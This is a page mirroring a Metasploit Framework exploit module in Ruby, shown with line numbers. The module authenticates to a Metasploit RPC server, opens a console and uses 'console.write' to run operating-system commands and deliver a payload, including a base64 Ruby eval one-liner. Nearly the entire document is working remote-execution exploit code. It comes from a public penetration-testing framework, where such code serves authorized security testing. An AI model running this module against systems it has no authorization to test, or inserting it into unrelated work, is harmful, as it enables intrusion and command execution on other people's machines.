Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/msf_rpc_console.rb
19778 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Metasploit RPC Console Command Execution',
16
'Description' => %q{
17
This module connects to a specified Metasploit RPC server and
18
uses the 'console.write' procedure to execute operating
19
system commands. Valid credentials are required to access the
20
RPC interface.
21
22
This module has been tested successfully on Metasploit 4.15
23
on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit
24
4.14 on Windows 7 SP1.
25
},
26
'License' => MSF_LICENSE,
27
'Author' => 'bcoles',
28
'References' => [
29
[ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],
30
[ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]
31
],
32
'Platform' => %w{ruby unix win},
33
'Targets' => [
34
[
35
'Ruby', {
36
'Arch' => ARCH_RUBY,
37
'Platform' => 'ruby',
38
'Payload' => { 'BadChars' => "\x00" }
39
}
40
],
41
[
42
'Windows CMD', {
43
'Arch' => ARCH_CMD,
44
'Platform' => 'win',
45
'Payload' => { 'BadChars' => "\x00\x0A\x0D" }
46
}
47
],
48
[
49
'Unix CMD', {
50
'Arch' => ARCH_CMD,
51
'Platform' => 'unix',
52
'Payload' => { 'BadChars' => "\x00\x0A\x0D" }
53
}
54
]
55
],
56
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },
57
'Privileged' => false,
58
'DisclosureDate' => '2011-05-22',
59
'DefaultTarget' => 0,
60
'Notes' => {
61
'Reliability' => UNKNOWN_RELIABILITY,
62
'Stability' => UNKNOWN_STABILITY,
63
'SideEffects' => UNKNOWN_SIDE_EFFECTS
64
}
65
)
66
)
67
register_options [
68
Opt::RPORT(55552),
69
OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),
70
OptString.new('PASSWORD', [true, 'Password for the specified username', '']),
71
OptBool.new('SSL', [ true, 'Use SSL', true])
72
]
73
end
74
75
def execute_command(cmd, opts = {})
76
res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"
77
78
if res.nil?
79
fail_with Failure::Unknown, 'Connection failed'
80
end
81
82
unless res['wrote'].to_s =~ /\A\d+\z/
83
print_error "Could not write to console #{@console_id}:"
84
print_line res.to_s
85
return
86
end
87
88
vprint_good "Wrote #{res['wrote']} bytes to console"
89
end
90
91
def exploit
92
begin
93
@rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl
94
rescue Rex::ConnectionRefused => e
95
fail_with Failure::Unreachable, 'Connection refused'
96
rescue => e
97
fail_with Failure::Unknown, "Connection failed: #{e}"
98
end
99
100
res = @rpc.login datastore['USERNAME'], datastore['PASSWORD']
101
102
if @rpc.token.nil?
103
fail_with Failure::NoAccess, 'Authentication failed'
104
end
105
106
print_good 'Authenticated successfully'
107
vprint_status "Received temporary token: #{@rpc.token}"
108
109
version = @rpc.call 'core.version'
110
111
if res.nil?
112
fail_with Failure::Unknown, 'Connection failed'
113
end
114
115
print_status "Metasploit #{version['version']}"
116
print_status "Ruby #{version['ruby']}"
117
print_status "API version #{version['api']}"
118
119
vprint_status 'Creating new console...'
120
res = @rpc.call 'console.create'
121
122
if res.nil?
123
fail_with Failure::Unknown, 'Connection failed'
124
end
125
126
unless res['id'].to_s =~ /\A\d+\z/
127
print_error 'Could not create console:'
128
print_line res.to_s
129
return
130
end
131
132
@console_id = res['id']
133
print_good "Created console ##{@console_id}"
134
135
print_status 'Sending payload...'
136
137
case target['Platform']
138
when 'ruby'
139
cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"
140
when 'win'
141
cmd = payload.encoded
142
when 'unix'
143
cmd = payload.encoded
144
else
145
fail_with Failure::NoTarget, 'Invalid target'
146
end
147
148
execute_command cmd
149
end
150
151
def cleanup
152
return if @console_id.nil?
153
154
vprint_status 'Removing console...'
155
res = @rpc.call 'console.destroy', @console_id
156
157
if res.nil?
158
print_error 'Connection failed'
159
return
160
end
161
162
unless res['result'].eql? 'success'
163
print_warning "Could not destroy console ##{@console_id}:"
164
print_line res.to_s
165
return
166
end
167
168
vprint_good "Destroyed console ##{@console_id}"
169
ensure
170
@rpc.close
171
end
172
end
173
174